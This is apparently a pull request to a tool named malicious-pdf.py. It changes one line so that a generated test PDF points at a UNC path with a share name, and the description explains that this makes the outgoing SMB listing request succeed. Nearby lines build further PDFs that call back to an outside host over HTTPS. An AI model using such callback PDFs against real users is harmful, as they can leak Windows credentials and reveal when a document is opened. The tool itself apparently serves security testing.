### PR TITLE
Added share name to test1.pdf

### DIFF
--- a/malicious-pdf.py
+++ b/malicious-pdf.py
@@ -619,7 +619,7 @@ if __name__ == "__main__":
 
   print("[+] Creating PDF files..")
 
-  create_malpdf("test1.pdf", '\\\\' + '\\\\'  + host + '\\\\' )
+  create_malpdf("test1.pdf", '\\\\' + '\\\\'  + host + '\\\\' + 'test')
   create_malpdf("test1bis.pdf", 'https://' + host)
   create_malpdf2("test2.pdf", 'https://' + host)
   create_malpdf3("test3.pdf", 'https://' + host)


### PR DESCRIPTION
`test1.pdf` was generated to access only `\\HOST\`, which may fail due to missing share name.

Instead, if a share name is specified in the path, the listing request succeeds, like `\\HOST\test` (even if the share does not exist).